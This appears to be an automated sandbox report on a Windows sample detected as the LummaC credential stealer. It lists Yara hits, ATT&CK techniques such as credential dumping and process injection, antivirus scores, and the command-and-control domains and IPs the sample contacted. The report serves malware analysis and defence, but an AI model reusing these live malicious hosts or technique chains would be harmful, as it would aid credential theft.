Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\Desktop\IzDjbVdHha.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior

Source: C:\Users\user\Desktop\IzDjbVdHha.exe

Directory queried: number of queries: 1001

Source: Yara match	File source: 00000000.00000002.2561282812.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2488574681.0000000000B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2486208016.0000000000B76000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: IzDjbVdHha.exe PID: 4344, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: IzDjbVdHha.exe PID: 4344, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	11 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	1 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	2 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	21 File and Directory Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	22 Software Packing	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
IzDjbVdHha.exe	53%	ReversingLabs	Win32.Spyware.Stealc
IzDjbVdHha.exe	100%	Avira	HEUR/AGEN.1312567
IzDjbVdHha.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
driblbemris.lat	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/Contec&	100%	Avira URL Cloud	malware
https://cdn.fastly.steamstatic.cC	0%	Avira URL Cloud	safe
https://lev-tolstoi.com/fC62K	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/ybh2	100%	Avira URL Cloud	malware
https://help.steampowered.co	100%	Avira URL Cloud	malware
https://lev-tolstoi.com/apib	100%	Avira URL Cloud	malware
https://store.steamp#&F	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	104.121.10.34	true	false	high
lev-tolstoi.com	172.67.157.254	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
sustainskelet.lat	unknown	unknown	false	high
crosshuaht.lat	unknown	unknown	false	high
rapeflowwj.lat	unknown	unknown	false	high
driblbemris.lat	unknown	unknown	true	unknown
grannyejh.lat	unknown	unknown	false	high
aspecteirs.lat	unknown	unknown	false	high
discokeyus.lat	unknown	unknown	false	high
energyaffai.lat	unknown	unknown	false	high
necklacebudi.lat	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
aspecteirs.lat	false		high
driblbemris.lat	true	Avira URL Cloud: malware	unknown
sustainskelet.lat	false		high
rapeflowwj.lat	false		high
https://steamcommunity.com/profiles/76561199724331900	false		high
energyaffai.lat	false		high
https://lev-tolstoi.com/api	false		high
grannyejh.lat	false		high
necklacebudi.lat	false		high
crosshuaht.lat	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	IzDjbVdHha.exe, 00000000.00000003.2399834008.000000000317B000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2398398502.000000000317E000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2400187277.000000000317B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://player.vimeo.com	IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	IzDjbVdHha.exe, 00000000.00000003.2399834008.000000000317B000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2398398502.000000000317E000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2400187277.000000000317B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?subsection=broadcasts	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/subscriber_agreement/	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.valvesoftware.com/legal.htm	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com	IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/Contec&	IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.fastly.steamstatic.cC	IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	IzDjbVdHha.exe, 00000000.00000003.2367940750.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	false		high
https://s.ytimg.com;	IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi	IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66E	IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/	IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/	IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B45000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000002.2561087270.0000000000AEF000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/privacy_agreement/	IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/points/shop/	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	IzDjbVdHha.exe, 00000000.00000003.2399834008.000000000317B000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2398398502.000000000317E000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2400187277.000000000317B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	IzDjbVdHha.exe, 00000000.00000003.2455166816.000000000331D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	IzDjbVdHha.exe, 00000000.00000003.2455166816.000000000331D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sketchfab.com	IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	IzDjbVdHha.exe, 00000000.00000003.2399834008.000000000317B000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2398398502.000000000317E000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2400187277.000000000317B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900/inventory/	IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	IzDjbVdHha.exe, 00000000.00000003.2463350593.0000000003535000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/privacy_agreement/	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.	IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/about/	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steamp#&F	IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	IzDjbVdHha.exe, 00000000.00000003.2399834008.000000000317B000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2398398502.000000000317E000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2400187277.000000000317B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://store.steampowered.com/subscriber_agreement/	IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/discussions/	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/ybh2	IzDjbVdHha.exe, 00000000.00000002.2561702247.000000000312C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://store.steampowered.com/stats/	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/fC62K	IzDjbVdHha.exe, 00000000.00000002.2561702247.000000000312C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/steam_refunds/	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	IzDjbVdHha.exe, 00000000.00000003.2455166816.000000000331D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	IzDjbVdHha.exe, 00000000.00000003.2455166816.000000000331D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	IzDjbVdHha.exe, 00000000.00000003.2399834008.000000000317B000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2398398502.000000000317E000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2400187277.000000000317B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a	IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/workshop/	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://login.steampowered.com/	IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	IzDjbVdHha.exe, 00000000.00000003.2463350593.0000000003535000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.mozilla.or	IzDjbVdHha.exe, 00000000.00000003.2463034561.0000000003168000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	IzDjbVdHha.exe, 00000000.00000003.2399834008.000000000317B000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2398398502.000000000317E000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2400187277.000000000317B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/modalP	IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://help.steampowered.co	IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://upx.sf.net	Amcache.hve.6.dr	false		high
https://store.steampowered.com/	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fast	IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
http://127.0.0.1:27060	IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	IzDjbVdHha.exe, 00000000.00000003.2367998675.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	IzDjbVdHha.exe, 00000000.00000003.2399834008.000000000317B000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2398398502.000000000317E000.00000004.00000800.00020000.00000000.sdmp, IzDjbVdHha.exe, 00000000.00000003.2400187277.000000000317B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO	IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lev-tolstoi.com/apib	IzDjbVdHha.exe, 00000000.00000002.2561702247.000000000312C000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	IzDjbVdHha.exe, 00000000.00000003.2455166816.000000000331D000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp	IzDjbVdHha.exe, 00000000.00000003.2367981029.0000000003111000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.steampowered.com/	IzDjbVdHha.exe, 00000000.00000003.2368128275.0000000000B3C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=eng	IzDjbVdHha.exe, 00000000.00000002.2561702247.0000000003110000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.157.254	lev-tolstoi.com	United States		13335	CLOUDFLARENETUS	false
104.121.10.34	steamcommunity.com	United States		16625	AKAMAI-ASUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581387
Start date and time:	2024-12-27 14:52:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	IzDjbVdHha.exe renamed because original name is a hash value
Original Sample Name:	b740dd94027c29d447f10e96c3e361ee.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/5@11/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 18 Number of non-executed functions: 184
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92, 13.107.246.63, 20.12.23.50, 20.231.128.65
Excluded domains from analysis (whitelisted): client.wns.windows.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: IzDjbVdHha.exe

Simulations

Behavior and APIs

Time	Type	Description
08:53:16	API Interceptor	12x Sleep call for process: IzDjbVdHha.exe modified
08:53:43	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
172.67.157.254	T4qO1i2Jav.exe	Get hash	malicious	LummaC Stealer	Browse
	k0ukcEH.exe	Get hash	malicious	LummaC	Browse
	pVbAZEFIpI.exe	Get hash	malicious	LummaC	Browse
	MaZjv5XeQi.exe	Get hash	malicious	LummaC	Browse
	jT7sgjdTea.exe	Get hash	malicious	LummaC	Browse
	Y4svWfRK1L.exe	Get hash	malicious	LummaC	Browse
	YKri2nEBWE.exe	Get hash	malicious	LummaC	Browse
	GtEVo1eO2p.exe	Get hash	malicious	LummaC	Browse
	SPFFah2O2q.exe	Get hash	malicious	LummaC	Browse
	4KDKJjRzm8.exe	Get hash	malicious	LummaC	Browse
104.121.10.34	i8Vwc7iOaG.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, Vidar	Browse
	fkawMJ7FH8.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, RedLine, Stealc	Browse
	hpEAJnNwCB.exe	Get hash	malicious	LummaC	Browse
	DG55Gu1yGM.exe	Get hash	malicious	LummaC	Browse
	he55PbvM2G.exe	Get hash	malicious	LummaC	Browse
	SkaKk8Z1J0.exe	Get hash	malicious	LummaC	Browse
	N1sb7Ii2YD.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Xmrig	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
lev-tolstoi.com	T4qO1i2Jav.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.157.254
	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.66.86
	k0ukcEH.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	pVbAZEFIpI.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	GxX48twWHA.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	ERTL09tA59.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	MaZjv5XeQi.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	jT7sgjdTea.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	Y4svWfRK1L.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	YKri2nEBWE.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
steamcommunity.com	T4qO1i2Jav.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106
	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106
	FXdg37pY22.exe	Get hash	malicious	LummaC Stealer	Browse	23.55.153.106
	k0ukcEH.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	8WRONDszv4.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT	Browse	23.55.153.106
	pVbAZEFIpI.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	GxX48twWHA.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	RUUSfr6dVm.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
